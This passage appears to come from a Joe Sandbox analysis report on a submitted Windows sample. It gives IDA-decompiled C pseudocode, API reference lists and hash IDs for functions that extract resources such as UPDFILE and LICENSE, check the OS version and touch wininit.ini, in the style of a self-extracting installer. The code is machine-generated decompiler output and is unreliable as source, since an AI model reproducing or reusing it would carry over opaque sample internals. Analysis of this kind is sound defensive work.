                                                                                                                                                                                                      						 *0xe79124 = 0x80070714;
                                                                                                                                                                                                      						_t36 = _t46;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t5 = _t45 + 8; // 0x8
                                                                                                                                                                                                      						_t44 = _t5;
                                                                                                                                                                                                      						_t40 = _t44;
                                                                                                                                                                                                      						_t6 = _t40 + 1; // 0x9
                                                                                                                                                                                                      						_t47 = _t6;
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_t26 =  *_t40;
                                                                                                                                                                                                      							_t40 = _t40 + 1;
                                                                                                                                                                                                      						} while (_t26 != 0);
                                                                                                                                                                                                      						_t41 = _t40 - _t47;
                                                                                                                                                                                                      						_t46 = _t51;
                                                                                                                                                                                                      						_t7 = _t41 + 1; // 0xa
                                                                                                                                                                                                      						 *0xe7a288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
                                                                                                                                                                                                      						_t30 = _v32();
                                                                                                                                                                                                      						if(_t51 != _t51) {
                                                                                                                                                                                                      							asm("int 0x29");
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_push(_t45);
                                                                                                                                                                                                      						if(_t30 == 0) {
                                                                                                                                                                                                      							_t36 = 0;
                                                                                                                                                                                                      							FreeResource(??);
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							FreeResource();
                                                                                                                                                                                                      							_v36 = _v36 + 1;
                                                                                                                                                                                                      							E00E7171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
                                                                                                                                                                                                      							_t46 = 0;
                                                                                                                                                                                                      							continue;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					L12:
                                                                                                                                                                                                      					return E00E76CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				goto L12;
                                                                                                                                                                                                      			}






















                                                                                                                                                                                                      0x00e76298
                                                                                                                                                                                                      0x00e762a0
                                                                                                                                                                                                      0x00e762a7
                                                                                                                                                                                                      0x00e762ad
                                                                                                                                                                                                      0x00e762af
                                                                                                                                                                                                      0x00e762bb
                                                                                                                                                                                                      0x00e762c3
                                                                                                                                                                                                      0x00e762c4
                                                                                                                                                                                                      0x00e7633b
                                                                                                                                                                                                      0x00e7633b
                                                                                                                                                                                                      0x00e76345
                                                                                                                                                                                                      0x00e7634d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e762da
                                                                                                                                                                                                      0x00e762de
                                                                                                                                                                                                      0x00e7635f
                                                                                                                                                                                                      0x00e76369
                                                                                                                                                                                                      0x00e762e0
                                                                                                                                                                                                      0x00e762e0
                                                                                                                                                                                                      0x00e762e0
                                                                                                                                                                                                      0x00e762e3
                                                                                                                                                                                                      0x00e762e5
                                                                                                                                                                                                      0x00e762e5
                                                                                                                                                                                                      0x00e762e8
                                                                                                                                                                                                      0x00e762e8
                                                                                                                                                                                                      0x00e762ea
                                                                                                                                                                                                      0x00e762eb
                                                                                                                                                                                                      0x00e762ef
                                                                                                                                                                                                      0x00e762f1
                                                                                                                                                                                                      0x00e762f3
                                                                                                                                                                                                      0x00e76302
                                                                                                                                                                                                      0x00e76308
                                                                                                                                                                                                      0x00e7630d
                                                                                                                                                                                                      0x00e76314
                                                                                                                                                                                                      0x00e76314
                                                                                                                                                                                                      0x00e76316
                                                                                                                                                                                                      0x00e76319
                                                                                                                                                                                                      0x00e76355
                                                                                                                                                                                                      0x00e76357
                                                                                                                                                                                                      0x00e7631b
                                                                                                                                                                                                      0x00e7631b
                                                                                                                                                                                                      0x00e76331
                                                                                                                                                                                                      0x00e76334
                                                                                                                                                                                                      0x00e76339
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e76339
                                                                                                                                                                                                      0x00e76319
                                                                                                                                                                                                      0x00e7636b
                                                                                                                                                                                                      0x00e7637d
                                                                                                                                                                                                      0x00e7637d
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00E7171E: _vsnprintf.MSVCRT ref: 00E71750
                                                                                                                                                                                                      • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,00E751CA,00000004,00000024,00E72F71,?,00000002,00000000), ref: 00E762CD
                                                                                                                                                                                                      • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,00E751CA,00000004,00000024,00E72F71,?,00000002,00000000), ref: 00E762D4
                                                                                                                                                                                                      • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00E751CA,00000004,00000024,00E72F71,?,00000002,00000000), ref: 00E7631B
                                                                                                                                                                                                      • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00E76345
                                                                                                                                                                                                      • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00E751CA,00000004,00000024,00E72F71,?,00000002,00000000), ref: 00E76357
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                                                                                                                                                      • String ID: UPDFILE%lu
                                                                                                                                                                                                      • API String ID: 2922116661-2329316264
                                                                                                                                                                                                      • Opcode ID: 779188bb9e4c2e3368da27649f3ad8a7a18c9a86ef90e177246ad2d6c298c69c
                                                                                                                                                                                                      • Instruction ID: 30bd7635b97fe80f64f76f0349e59f213a2a570e7c4a8bdcad68c3b7b4866836
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 779188bb9e4c2e3368da27649f3ad8a7a18c9a86ef90e177246ad2d6c298c69c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F3210471A00619AFDB109F65CC459FFBB78EB84708B048169F90AB3241DB358D06CBE0
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E00E73A3F(void* __eflags) {
                                                                                                                                                                                                      				void* _t3;
                                                                                                                                                                                                      				void* _t9;
                                                                                                                                                                                                      				CHAR* _t16;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t16 = "LICENSE";
                                                                                                                                                                                                      				_t1 = E00E7468F(_t16, 0, 0) + 1; // 0x1
                                                                                                                                                                                                      				_t3 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                      				 *0xe78d4c = _t3;
                                                                                                                                                                                                      				if(_t3 != 0) {
                                                                                                                                                                                                      					_t19 = _t16;
                                                                                                                                                                                                      					if(E00E7468F(_t16, _t3, _t28) != 0) {
                                                                                                                                                                                                      						if(lstrcmpA( *0xe78d4c, "<None>") == 0) {
                                                                                                                                                                                                      							LocalFree( *0xe78d4c);
                                                                                                                                                                                                      							L9:
                                                                                                                                                                                                      							 *0xe79124 = 0;
                                                                                                                                                                                                      							return 1;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t9 = E00E76517(_t19, 0x7d1, 0, E00E73100, 0, 0);
                                                                                                                                                                                                      						LocalFree( *0xe78d4c);
                                                                                                                                                                                                      						if(_t9 != 0) {
                                                                                                                                                                                                      							goto L9;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						 *0xe79124 = 0x800704c7;
                                                                                                                                                                                                      						L2:
                                                                                                                                                                                                      						return 0;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					E00E744B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                      					LocalFree( *0xe78d4c);
                                                                                                                                                                                                      					 *0xe79124 = 0x80070714;
                                                                                                                                                                                                      					goto L2;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				E00E744B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                      				 *0xe79124 = E00E76285();
                                                                                                                                                                                                      				goto L2;
                                                                                                                                                                                                      			}






                                                                                                                                                                                                      0x00e73a46
                                                                                                                                                                                                      0x00e73a57
                                                                                                                                                                                                      0x00e73a5d
                                                                                                                                                                                                      0x00e73a63
                                                                                                                                                                                                      0x00e73a6a
                                                                                                                                                                                                      0x00e73a91
                                                                                                                                                                                                      0x00e73a9a
                                                                                                                                                                                                      0x00e73ad8
                                                                                                                                                                                                      0x00e73b13
                                                                                                                                                                                                      0x00e73b19
                                                                                                                                                                                                      0x00e73b1b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e73b21
                                                                                                                                                                                                      0x00e73ae7
                                                                                                                                                                                                      0x00e73af4
                                                                                                                                                                                                      0x00e73afc
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e73afe
                                                                                                                                                                                                      0x00e73a87
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e73a87
                                                                                                                                                                                                      0x00e73aa8
                                                                                                                                                                                                      0x00e73ab3
                                                                                                                                                                                                      0x00e73ab9
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e73ab9
                                                                                                                                                                                                      0x00e73a78
                                                                                                                                                                                                      0x00e73a82
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00E7468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E746A0
                                                                                                                                                                                                        • Part of subcall function 00E7468F: SizeofResource.KERNEL32(00000000,00000000,?,00E72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E746A9
                                                                                                                                                                                                        • Part of subcall function 00E7468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E746C3
                                                                                                                                                                                                        • Part of subcall function 00E7468F: LoadResource.KERNEL32(00000000,00000000,?,00E72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E746CC
                                                                                                                                                                                                        • Part of subcall function 00E7468F: LockResource.KERNEL32(00000000,?,00E72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E746D3
                                                                                                                                                                                                        • Part of subcall function 00E7468F: memcpy_s.MSVCRT ref: 00E746E5
                                                                                                                                                                                                        • Part of subcall function 00E7468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00E746EF
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00E72F64,?,00000002,00000000), ref: 00E73A5D
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00E73AB3
                                                                                                                                                                                                        • Part of subcall function 00E744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00E74518
                                                                                                                                                                                                        • Part of subcall function 00E744B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00E74554
                                                                                                                                                                                                        • Part of subcall function 00E76285: GetLastError.KERNEL32(00E75BBC), ref: 00E76285
                                                                                                                                                                                                      • lstrcmpA.KERNEL32(<None>,00000000), ref: 00E73AD0
                                                                                                                                                                                                      • LocalFree.KERNEL32 ref: 00E73B13
                                                                                                                                                                                                        • Part of subcall function 00E76517: FindResourceA.KERNEL32(00E70000,000007D6,00000005), ref: 00E7652A
                                                                                                                                                                                                        • Part of subcall function 00E76517: LoadResource.KERNEL32(00E70000,00000000,?,?,00E72EE8,00000000,00E719E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00E76538
                                                                                                                                                                                                        • Part of subcall function 00E76517: DialogBoxIndirectParamA.USER32(00E70000,00000000,00000547,00E719E0,00000000), ref: 00E76557
                                                                                                                                                                                                        • Part of subcall function 00E76517: FreeResource.KERNEL32(00000000,?,?,00E72EE8,00000000,00E719E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00E76560
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,00E73100,00000000,00000000), ref: 00E73AF4
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                                                                                                                                      • String ID: <None>$LICENSE
                                                                                                                                                                                                      • API String ID: 2414642746-383193767
                                                                                                                                                                                                      • Opcode ID: eed5f9c7526a76da6bf5bc351cb6f05850112f90e1219a7bfea232e855ad7637
                                                                                                                                                                                                      • Instruction ID: ef0d1e7eabe32648689be27c68eb882169a6f90075ef63e7f102f2ddd93f2d4f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: eed5f9c7526a76da6bf5bc351cb6f05850112f90e1219a7bfea232e855ad7637
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1C11A5703412016FD760EF73AD09E1B3AEDDBD5710B10E43EBA4DF51E1DA798845A621
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 94%
                                                                                                                                                                                                      			E00E724E0(void* __ebx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t7;
                                                                                                                                                                                                      				void* _t20;
                                                                                                                                                                                                      				long _t26;
                                                                                                                                                                                                      				signed int _t27;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t20 = __ebx;
                                                                                                                                                                                                      				_t7 =  *0xe78004; // 0xd47724e2
                                                                                                                                                                                                      				_v8 = _t7 ^ _t27;
                                                                                                                                                                                                      				_t25 = 0x104;
                                                                                                                                                                                                      				_t26 = 0;
                                                                                                                                                                                                      				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                      					E00E7658A( &_v268, 0x104, "wininit.ini");
                                                                                                                                                                                                      					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                                                                                                                                                                                                      					_t25 = _lopen( &_v268, 0x40);
                                                                                                                                                                                                      					if(_t25 != 0xffffffff) {
                                                                                                                                                                                                      						_t26 = _llseek(_t25, 0, 2);
                                                                                                                                                                                                      						_lclose(_t25);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E00E76CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                                                                                                                                                                                                      			}











                                                                                                                                                                                                      0x00e724e0
                                                                                                                                                                                                      0x00e724eb
                                                                                                                                                                                                      0x00e724f2
                                                                                                                                                                                                      0x00e724f7
                                                                                                                                                                                                      0x00e72504
                                                                                                                                                                                                      0x00e7250e
                                                                                                                                                                                                      0x00e7251d
                                                                                                                                                                                                      0x00e7252c
                                                                                                                                                                                                      0x00e72541
                                                                                                                                                                                                      0x00e72546
                                                                                                                                                                                                      0x00e72553
                                                                                                                                                                                                      0x00e72555
                                                                                                                                                                                                      0x00e72555
                                                                                                                                                                                                      0x00e72546
                                                                                                                                                                                                      0x00e7256c

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00E72506
                                                                                                                                                                                                      • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 00E7252C
                                                                                                                                                                                                      • _lopen.KERNEL32(?,00000040), ref: 00E7253B
                                                                                                                                                                                                      • _llseek.KERNEL32(00000000,00000000,00000002), ref: 00E7254C
                                                                                                                                                                                                      • _lclose.KERNEL32(00000000), ref: 00E72555
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                                                                                                                                      • String ID: wininit.ini
                                                                                                                                                                                                      • API String ID: 3273605193-4206010578
                                                                                                                                                                                                      • Opcode ID: 9f49432fdde08cfdd97dc6960ce0fe646dfaef9f1b99fd40cbbf4a698e9e4f88
                                                                                                                                                                                                      • Instruction ID: 40939f5608e5c4942cdef8b395469421751f262956e5c09880bd9652438916ee
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9f49432fdde08cfdd97dc6960ce0fe646dfaef9f1b99fd40cbbf4a698e9e4f88
                                                                                                                                                                                                      • Instruction Fuzzy Hash: ED01B5326002186BD720DB669C0CEDFBBBDEB85750F044565FA4DF3190DE748E89CA91
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 75%
                                                                                                                                                                                                      			E00E736EE(CHAR* __ecx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				struct _OSVERSIONINFOA _v416;
                                                                                                                                                                                                      				signed int _v420;
                                                                                                                                                                                                      				signed int _v424;
                                                                                                                                                                                                      				CHAR* _v428;
                                                                                                                                                                                                      				CHAR* _v432;
                                                                                                                                                                                                      				signed int _v436;
                                                                                                                                                                                                      				CHAR* _v440;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t72;
                                                                                                                                                                                                      				CHAR* _t77;
                                                                                                                                                                                                      				CHAR* _t91;
                                                                                                                                                                                                      				CHAR* _t94;
                                                                                                                                                                                                      				int _t97;
                                                                                                                                                                                                      				CHAR* _t98;
                                                                                                                                                                                                      				signed char _t99;
                                                                                                                                                                                                      				CHAR* _t104;
                                                                                                                                                                                                      				signed short _t107;
                                                                                                                                                                                                      				signed int _t109;
                                                                                                                                                                                                      				short _t113;
                                                                                                                                                                                                      				void* _t114;
                                                                                                                                                                                                      				signed char _t115;
                                                                                                                                                                                                      				short _t119;
                                                                                                                                                                                                      				CHAR* _t123;
                                                                                                                                                                                                      				CHAR* _t124;
                                                                                                                                                                                                      				CHAR* _t129;
                                                                                                                                                                                                      				signed int _t131;
                                                                                                                                                                                                      				signed int _t132;
                                                                                                                                                                                                      				CHAR* _t135;
                                                                                                                                                                                                      				CHAR* _t138;
                                                                                                                                                                                                      				signed int _t139;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t72 =  *0xe78004; // 0xd47724e2
                                                                                                                                                                                                      				_v8 = _t72 ^ _t139;
                                                                                                                                                                                                      				_v416.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                      				_t115 = __ecx;
                                                                                                                                                                                                      				_t135 = 0;
                                                                                                                                                                                                      				_v432 = __ecx;
                                                                                                                                                                                                      				_t138 = 0;
                                                                                                                                                                                                      				if(GetVersionExA( &_v416) != 0) {
                                                                                                                                                                                                      					_t133 = _v416.dwMajorVersion;
                                                                                                                                                                                                      					_t119 = 2;
                                                                                                                                                                                                      					_t77 = _v416.dwPlatformId - 1;
                                                                                                                                                                                                      					__eflags = _t77;
                                                                                                                                                                                                      					if(_t77 == 0) {
                                                                                                                                                                                                      						_t119 = 0;
                                                                                                                                                                                                      						__eflags = 1;
                                                                                                                                                                                                      						 *0xe78184 = 1;
                                                                                                                                                                                                      						 *0xe78180 = 1;
                                                                                                                                                                                                      						L13:
                                                                                                                                                                                                      						 *0xe79a40 = _t119;
                                                                                                                                                                                                      						L14:
                                                                                                                                                                                                      						__eflags =  *0xe78a34 - _t138; // 0x0
                                                                                                                                                                                                      						if(__eflags != 0) {
                                                                                                                                                                                                      							goto L66;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						__eflags = _t115;
                                                                                                                                                                                                      						if(_t115 == 0) {
                                                                                                                                                                                                      							goto L66;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_v428 = _t135;
                                                                                                                                                                                                      						__eflags = _t119;
                                                                                                                                                                                                      						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
                                                                                                                                                                                                      						_t11 =  &_v420;
                                                                                                                                                                                                      						 *_t11 = _v420 & _t138;
                                                                                                                                                                                                      						__eflags =  *_t11;
                                                                                                                                                                                                      						_v440 = _t115;
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_v424 = _t135 * 0x18;
                                                                                                                                                                                                      							_v436 = E00E72A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
                                                                                                                                                                                                      							_t91 = E00E72A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
                                                                                                                                                                                                      							_t123 = _v436;
                                                                                                                                                                                                      							_t133 = 0x54d;
                                                                                                                                                                                                      							__eflags = _t123;
                                                                                                                                                                                                      							if(_t123 < 0) {
                                                                                                                                                                                                      								L32:
                                                                                                                                                                                                      								__eflags = _v420 - 1;
                                                                                                                                                                                                      								if(_v420 == 1) {
                                                                                                                                                                                                      									_t138 = 0x54c;
                                                                                                                                                                                                      									L36:
                                                                                                                                                                                                      									__eflags = _t138;
                                                                                                                                                                                                      									if(_t138 != 0) {
                                                                                                                                                                                                      										L40:
                                                                                                                                                                                                      										__eflags = _t138 - _t133;
                                                                                                                                                                                                      										if(_t138 == _t133) {
                                                                                                                                                                                                      											L30:
                                                                                                                                                                                                      											_v420 = _v420 & 0x00000000;
                                                                                                                                                                                                      											_t115 = 0;
                                                                                                                                                                                                      											_v436 = _v436 & 0x00000000;
                                                                                                                                                                                                      											__eflags = _t138 - _t133;
                                                                                                                                                                                                      											_t133 = _v432;
                                                                                                                                                                                                      											if(__eflags != 0) {
                                                                                                                                                                                                      												_t124 = _v440;
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
                                                                                                                                                                                                      												_v420 =  &_v268;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											__eflags = _t124;
                                                                                                                                                                                                      											if(_t124 == 0) {
                                                                                                                                                                                                      												_t135 = _v436;
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												_t99 = _t124[0x30];
                                                                                                                                                                                                      												_t135 = _t124[0x34] + 0x84 + _t133;
                                                                                                                                                                                                      												__eflags = _t99 & 0x00000001;
                                                                                                                                                                                                      												if((_t99 & 0x00000001) == 0) {
                                                                                                                                                                                                      													asm("sbb ebx, ebx");
                                                                                                                                                                                                      													_t115 =  ~(_t99 & 2) & 0x00000101;
                                                                                                                                                                                                      												} else {
                                                                                                                                                                                                      													_t115 = 0x104;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											__eflags =  *0xe78a38 & 0x00000001;
                                                                                                                                                                                                      											if(( *0xe78a38 & 0x00000001) != 0) {
                                                                                                                                                                                                      												L64:
                                                                                                                                                                                                      												_push(0);
                                                                                                                                                                                                      												_push(0x30);
                                                                                                                                                                                                      												_push(_v420);
                                                                                                                                                                                                      												_push("cent");
                                                                                                                                                                                                      												goto L65;
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												__eflags = _t135;
                                                                                                                                                                                                      												if(_t135 == 0) {
                                                                                                                                                                                                      													goto L64;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												__eflags =  *_t135;
                                                                                                                                                                                                      												if( *_t135 == 0) {
                                                                                                                                                                                                      													goto L64;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												MessageBeep(0);
                                                                                                                                                                                                      												_t94 = E00E7681F(_t115);
                                                                                                                                                                                                      												__eflags = _t94;
                                                                                                                                                                                                      												if(_t94 == 0) {
                                                                                                                                                                                                      													L57:
                                                                                                                                                                                                      													0x180030 = 0x30;
                                                                                                                                                                                                      													L58:
                                                                                                                                                                                                      													_t97 = MessageBoxA(0, _t135, "cent", 0x00180030 | _t115);
                                                                                                                                                                                                      													__eflags = _t115 & 0x00000004;
                                                                                                                                                                                                      													if((_t115 & 0x00000004) == 0) {
                                                                                                                                                                                                      														__eflags = _t115 & 0x00000001;
                                                                                                                                                                                                      														if((_t115 & 0x00000001) == 0) {
                                                                                                                                                                                                      															goto L66;
                                                                                                                                                                                                      														}
                                                                                                                                                                                                      														__eflags = _t97 - 1;
                                                                                                                                                                                                      														L62:
                                                                                                                                                                                                      														if(__eflags == 0) {
                                                                                                                                                                                                      															_t138 = 0;
                                                                                                                                                                                                      														}
                                                                                                                                                                                                      														goto L66;
                                                                                                                                                                                                      													}
                                                                                                                                                                                                      													__eflags = _t97 - 6;
                                                                                                                                                                                                      													goto L62;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												_t98 = E00E767C9(_t124, _t124);
                                                                                                                                                                                                      												__eflags = _t98;
                                                                                                                                                                                                      												if(_t98 == 0) {
                                                                                                                                                                                                      													goto L57;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												goto L58;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										__eflags = _t138 - 0x54c;
                                                                                                                                                                                                      										if(_t138 == 0x54c) {
                                                                                                                                                                                                      											goto L30;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										__eflags = _t138;
                                                                                                                                                                                                      										if(_t138 == 0) {
                                                                                                                                                                                                      											goto L66;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										_t135 = 0;
                                                                                                                                                                                                      										__eflags = 0;
                                                                                                                                                                                                      										goto L44;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									L37:
                                                                                                                                                                                                      									_t129 = _v432;
                                                                                                                                                                                                      									__eflags = _t129[0x7c];
                                                                                                                                                                                                      									if(_t129[0x7c] == 0) {
                                                                                                                                                                                                      										goto L66;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									_t133 =  &_v268;
                                                                                                                                                                                                      									_t104 = E00E728E8(_t129,  &_v268, _t129,  &_v428);
                                                                                                                                                                                                      									__eflags = _t104;
                                                                                                                                                                                                      									if(_t104 != 0) {
                                                                                                                                                                                                      										goto L66;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									_t135 = _v428;
                                                                                                                                                                                                      									_t133 = 0x54d;
                                                                                                                                                                                                      									_t138 = 0x54d;
                                                                                                                                                                                                      									goto L40;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								goto L33;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							__eflags = _t91;
                                                                                                                                                                                                      							if(_t91 > 0) {
                                                                                                                                                                                                      								goto L32;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							__eflags = _t123;
                                                                                                                                                                                                      							if(_t123 != 0) {
                                                                                                                                                                                                      								__eflags = _t91;
                                                                                                                                                                                                      								if(_t91 != 0) {
                                                                                                                                                                                                      									goto L37;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
                                                                                                                                                                                                      								L27:
                                                                                                                                                                                                      								if(__eflags <= 0) {
                                                                                                                                                                                                      									goto L37;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								L28:
                                                                                                                                                                                                      								__eflags = _t135;
                                                                                                                                                                                                      								if(_t135 == 0) {
                                                                                                                                                                                                      									goto L33;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_t138 = 0x54c;
